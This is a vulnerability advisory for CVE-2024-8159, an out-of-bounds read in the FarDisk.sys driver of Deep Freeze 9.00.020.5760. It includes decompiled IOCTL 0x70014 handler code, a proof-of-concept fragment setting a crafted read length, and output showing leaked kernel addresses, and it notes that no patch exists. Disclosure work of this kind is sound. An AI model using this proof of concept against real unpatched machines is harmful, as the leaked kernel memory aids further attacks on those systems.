---
slug: advisories/kanka/
title: Deep Freeze - Out-of-bounds Read
authors: Andres Roldan
writer: aroldan
codename: kanka
product: Deep Freeze 9.00.020.5760
date: 2024-08-25 12:00 COT
cveid: CVE-2024-8159
severity: 5.8
description: Deep Freeze 9.00.020.5760 - Out-of-bounds Read Vulnerability
keywords: Fluid Attacks, Security, Vulnerabilities, Overflow, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

| | |
| --------------------- | ---------------------------------------------------------------------------------|
| **Name** | Deep Freeze 9.00.020.5760 - Out-of-bounds read |
| **Code name** | [El Kanka](https://es.wikipedia.org/wiki/El_Kanka) |
| **Product** | Deep Freeze |
| **Vendor** | Faronics Corporation |
| **Affected versions** | Version 9.00.020.5760 |
| **State** | Public |
| **Release date** | 2024-08-24 |

## Vulnerability

| | |
| --------------------- | ----------------------------------------------------------------------------------------------------------------------------|
| **Kind** | Out-of-bounds read |
| **Rule** | [111. Out-of-bounds Read](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-111/) |
| **Remote** | No |
| **CVSSv3 Vector** | CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H |
| **CVSSv3 Base Score** | 5.8 |
| **Exploit available** | Yes |
| **CVE ID(s)** | [CVE-2024-8159](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8159) |

## Description

Deep Freeze 9.00.020.5760 is vulnerable to
an out-of-bounds read vulnerability by triggering the
`0x70014` IOCTL code of the `FarDisk.sys` driver.

## Vulnerability

The `0x70014` IOCTL code of the `FarDisk.sys` driver
allows performing an Out-of-bounds read.

The following is the handling code of the `0x70014` IOCTL:

```c
 if ( CurrentStackLocation->Parameters.Create.Options >= 0x10 )
    {
      v10 = 0;
      Irp->IoStatus.Information = LODWORD(Irp->AssociatedIrp.SystemBuffer->MdlAddress);
      goto LABEL_73;
```

When the `nInBufferSize` parameter of the IOCTL
request is greater or equal than `0x10`, the second
DWORD of the user-controlled `SystemBuffer` is passed
to the IO manager as the returned bytes for the
IO response. This allows an attacker to control how
many bytes to read past the allocated `SystemBuffer`
memory block.

A snipped of the proof-of-concept code is the following:

```c
((PDWORD64)((DWORD64)inBuf + 0))[0] = (ULONGLONG)0x4141414141414141;
((PDWORD64)((DWORD64)inBuf + 8))[0] = (ULONGLONG)0x4242424243434343;


DWORD IoControlCode = 0x70014;
InputBuffer = (ULONGLONG)inBuf;
DWORD InputBufferLength = 0x10;
OutputBuffer = (ULONGLONG)outBuf;
DWORD OutputBufferLength = 0x10;
```

With that, the attacker can read `0x42424242` bytes
from adjacent objects, leaking whatever the object
leaked can have, including user and kernel addresses:

```powershell
PS C:\Users\admin\Desktop> .\PoC.exe
[+] 0x70014: Bytes returned: 1111638594 (0x42424242)
[+] Truncated (0x50) output (0): 4141414141414141
[+] Truncated (0x50) output (8): 4242424242424242
[+] Truncated (0x50) output (16): 00007FFAFDAE7F04
[+] Truncated (0x50) output (24): 0000000000000000
[+] Truncated (0x50) output (32): 0000000000000000
[+] Truncated (0x50) output (40): 0000000000000000
[+] Truncated (0x50) output (48): 0000000000000000
[+] Truncated (0x50) output (56): 0000000000000000
[+] Truncated (0x50) output (64): FFFFAD81A464B998
[+] Truncated (0x50) output (72): 0000000000000001
[+] Truncated (0x50) output (80): 77776D4D02060000
[+] Truncated (0x50) output (88): 0000000000000000
[+] Truncated (0x50) output (96): 0000000000000000
[+] Truncated (0x50) output (104): FFFFAD819DCFB970
[+] Truncated (0x50) output (112): 0000000000000000
[+] Truncated (0x50) output (120): 0000000000000000
```

## Our security policy

We have reserved the ID CVE-2024-8159 to refer
to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Deep Freeze 9.00.020.5760
* Operating System: Windows

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Andres Roldan](https://www.linkedin.com/in/andres-roldan/)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://www.faronics.com/>

**Product page** <https://www.faronics.com/es/products/deep-freeze>

## Timeline

<time-lapse
  discovered="2024-08-25"
  contacted="2024-08-25"
  replied=""
  confirmed=""
  patched=""
  disclosure="">
</time-lapse>
